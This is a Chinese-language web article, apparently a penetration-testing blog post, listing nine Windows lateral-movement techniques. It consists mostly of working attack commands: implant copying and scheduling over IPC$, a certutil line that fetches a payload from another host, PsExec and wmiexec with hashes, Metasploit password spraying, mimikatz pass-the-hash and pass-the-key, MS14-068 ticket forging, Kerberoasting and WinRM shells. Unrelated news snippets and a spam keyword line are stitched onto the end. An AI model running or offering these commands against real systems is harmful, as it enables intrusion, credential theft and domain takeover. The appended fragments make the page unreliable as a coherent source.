<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網橫向移動的九種方式

    VSole2021-12-03 06:30:57

    實驗環境

    1-4 所用環境如下:

    5-9 所用環境如下:

    1.IPC橫向

    IPC(Internet Process Connection)共享命名管道的資源,是為了實現進程間通信而開放的命名管道。IPC可以通過驗證用戶名和密碼獲得相應的權限,使用139、445端口。
    1.1 利用條件
    1、目標機開啟了139和445端口;
    2、目標主機管理員開啟了ipc$默認共享;
    3、知道目標機的賬戶密碼。
    
    1.2 命令
    建立IPC連接命令:
    net use \\191.168.52.136\ipc$ "password" /user:"Administrator"
    斷開連接:
    net use \\x.x.x.x\ipc$ /del
    查看連接是否建立:
    net use
    

    建立IPC連接后可以使用計劃任務執行木馬上線。
    拷貝木馬:
    copy beacon.exe \\191.168.52.136\c$
    創建計劃任務(at<2012、schtasks>=2012):
    at \\191.168.52.136 15:47 c:\beacon.exe
    

    2.WMI橫向

    WMI全稱“windows管理規范”,從win2003開始一直存在。它原本的作用是方便管理員對windows主機進行管理。因此在內網滲透中,我們可以使用WMI進行橫向移動。
    2.1利用條件
    1、WMI服務開啟,端口135,默認開啟。
    2、防火墻允許135、445等端口通信。
    3、知道目標機的賬戶密碼。
    
    2.2wmic
    wmic /node:191.168.52.136 /user:xxxx /password:xxxxx  process call create "cmd.exe /c ipconfig>d:\result.txt"
    無需上傳第三方軟件,利用系統內置程序,單命令執行,執行后無結果回顯
    

    2.3 cscript
    cscript //nologo wmiexec.vbs /shell 191.168.52.136  
    需上傳wmiexec.vbs然后進入該服務器內進行執行
    

    2.4 wmiexec
    1.執行命令:
    python wmiexec.py ./:@192.168.52.136 "cmd.exe /c certutil -urlcache -split -f   http://192.168.52.137:8090/wmi.exe C:\wmi.exe"
    2.用hash的方式:
    python wmiexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./qaxnb@192.168.52.136 "whoami"
    第三方軟件 (交互式&單執行),容易被殺
    

    3.smb橫向

    利用SMB服務可以通過明文或hash傳遞來遠程執行。
    3.1 利用條件
    1、445端口開放
    2、知道賬號密碼
    
    3.2 psexec(微軟官方工具)
    PsExec64.exe \\192.168.52.136 -u <username> -p <password> -s cmd
    
    3.3 psexec(impacket工具)
    python psexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./qaxnb@192.168.52.136
    

    3.4 smbexec
    python smbexec.py ./:@192.168.52.136
    

    4.密碼噴灑

    4.1利用metasploit進行密碼噴灑
    msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
    msf6 exploit(windows/smb/psexec) > set smbuser user.txt
    msf6 exploit(windows/smb/psexec) > set smbpass password.txt
    msf6 exploit(windows/smb/psexec) > set rhost 192.168.52.0/24
    msf6 exploit(windows/smb/psexec) > run
    

    5.PTH-哈希傳遞

    PTH,即Pass The Hash,通過找到與賬號相關的密碼散列值(通常是NTLM Hash)來進行攻擊。在域環境中,用戶登錄計算機時使用的大都是域賬號,大量計算機在安裝時會使用相同的本地管理員賬號和密碼。因此,如果計算機的本地管理員賬號和密碼也是相同的,攻擊者就可以使用哈希傳遞的方法登錄到內網主機的其他計算機。
    5.1 利用條件
    1、在工作組環境中:
    Windows Vista 之前的機器,可以使用本地管理員組內用戶進行攻擊。
    Windows Vista 之后的機器,只能是administrator用戶的哈希值才能進行哈希傳遞攻擊,其他用戶(包括管理員用戶但是非administrator)也不能使用哈希傳遞攻擊,會提示拒絕訪問
    
    2、在域環境中:
    只能是域管理員組內用戶(可以是域管理員組內非administrator用戶)的哈希值才能進行哈希傳遞攻擊,攻擊成功后,可以訪問域內任何一臺機器
    如果要用普通域管理員賬號進行哈希傳遞攻擊,則需要修改修改目標機器的 LocalAccountTokenFilterPolicy為1
    
    5.2 MiMiKatz-PTH
    1. mimikatz privilege::debug
    2. mimikatz sekurlsa::pth /user:administrator /domain:goksec.org /ntlm:8a963371a63944419ec1adf687bb1be5
    3. steal_token PID
    



    6.PTK-mimiKatZ

    即Pass The Key ,當系統安裝了KB2871997補丁且禁用了NTLM的時候,那我們抓取到的ntlm hash.也就失去了作用,但是可以通過pass the key的攻擊方式獲得權限。
    761 利用條件
    獲取用戶的aes key
    mimikatz sekurlsa::ekeys
    sekurlsa::pth /user:xxx /domain:xxx /aes256:xxxxxxxx"
    成功后會返回一個cmd
    

    7.PtT-票據傳遞(ms14-068)

    7.1 利用條件
    1.域控沒有打MS14-068的補丁(KB3011780)
    2.拿下一臺加入域的計算機
    3.有這臺域內計算機的域用戶密碼和Sid
    

    7.2 利用步驟
    先清空當前機器的票據信息
    mimikatz kerberos::list //列出當前票據
    mimikatz kerberos::purge //清除票據
    然后查看本機的sid
    whoami /all
    

    ms14-068生成tgt票據
    ms14-068.exe -u lisi@goksec.org -p goksec@2021 -s S-1-5-21-1797401017-738776913-2751391128-1106 -d DC.goksec.org
    


    導入票據
    mimikatz kerberos::ptc <>>
    使用如下命令,可成功讀取域控主機C盤目錄下文件
    shell dir \\DC.goksec.org\c$
    

    8.kerberoast攻擊

    攻擊者從 TGS-REP 中提取加密的服務票證。由于服務票證是用鏈接到請求 SPN 的帳戶的哈希加密的,所以攻擊者可以離線破解這個加密塊,恢復帳戶的明文密碼。
    8.1 如何得到域中的SPN?
    1. setspn -q */*
    2. cscript GetUserSPNs.vbs
    

    8.2 請求服務票據
    mimikatz kerberos::ask /target:
    

    8.3 導出票據
    mimikatz kerberos::list /export
    

    8.4 破解服務票據:
    python3 tgsrepcrack.py password.txt xxxx.kirbi
    

    9.WinRM橫向

    WinRM代表Windows遠程管理,是一種允許管理員遠程執行系統管理任務的服務。默認情況下支持Kerberos和NTLM身份驗證以及基本身份驗證。
    9.1 利用條件
    1、在win 2012之后(包括win 2012)的版本是默認開啟的,win 2012之前利用需要手動開啟winRM。
    2、防火墻對5986、5985端口開放。
    

    9.2 CMD執行
    winrs -r:192.168.52.10 -u:192.168.52.10\用戶名 -p:xxxxx "ipconfig"
    
    獲取交互式shell
    winrs -r:192.168.52.10 -u:192.168.52.10\用戶名 -p:xxxxx cmd
    

    10.相關資源

    https://www.freebuf.com/articles/system/174967.html
    https://github.com/nidem/kerberoast
    https://github.com/xan7r/kerberoast
    https://github.com/SecureAuthCorp/impacket
    https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
    https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
    
    軟件哈希
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    2020年2月7日, 澳大利亞政府發布了“國家區塊鏈路線圖”, 此次發布的區塊鏈路線圖意義深遠,旨在使澳大利亞成為區塊鏈產業的全球領導者。
    Bleeping Computer 網站消息,豐田金融服務公司(TFS)證實,在 Medusa(美杜莎)勒索軟件聲稱對其歐洲和非洲一些網絡系統進行攻擊后,公司內部安全人員檢測到了未經授權的惡意訪問。
    Security Affairs 網站披露,Outpost 24 的研究人員 Astrid Tedenbrant 在 Nagios XI 網絡和 IT 基礎架構監控與管理解決方案中發現四個漏洞,漏洞分別追蹤為 CVE-2023-40931、CVE-2023-40932、CVE-2023-40933、CVE-2023-40934,可能導致信息泄露和權限升級。
    PaperCut應用服務器在上個月進行了更新,存在兩個主要漏洞,該漏洞可能會允許遠程攻擊者執行未經認證的代碼和訪問敏感信息。
    根據分析人員的觀察,該團伙并不針對特定部門或者地區進行攻擊。密文以 base64 編碼的形式存在于二進制文件中,解碼后使用固定的密鑰進行解密。此外,各種數據備份與反惡意軟件服務也會被終止。清除日志是勒索軟件用于掩蓋蹤跡并阻礙分析人員調查的常用手段,后續就會開始加密行為。根據其網站披露的信息,受害者的行業分布排名為教育、IT、醫療保健、制造業與食品生產。
    由于單一端點上的終端安全防護軟件缺乏對威脅態勢的背景理解、對最新威脅缺乏感知。在遇到未知威脅時,很多終端安全防護軟件會將掃描文件的相關信息回傳給遠端服務,基于全球海量威脅的深度理解做出判斷,響應終端安全防護軟件進行相應的操作,如隔離或者清除惡意軟件。
    英偉達上周遭到網絡攻擊,攻擊者據報道為勒索軟件組織 LAPSUS$。該組織聲稱它潛入英偉達網絡長達一周,竊取了 1TB 的數據。LAPSUS$ 稱在此期間它獲得了英偉達許多系統的管理級別訪問權限,它獲得的數據包括驅動程序、電路圖和固件。英偉達據報道對該組織發起了反擊,用勒索軟件感染了攻擊者的系統,加密了被盜數據。但 LAPSUS$ 表示它有備份,開始出售竊取的數據,其中包括 GA102 / GA1
    隨著 5G、云計算、人工智能、大數據、區塊鏈等技術的日新月異,數字化轉型進程逐步推進,軟件已經成為日常生產生活必備要素之一,滲透到各個行業和領域。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类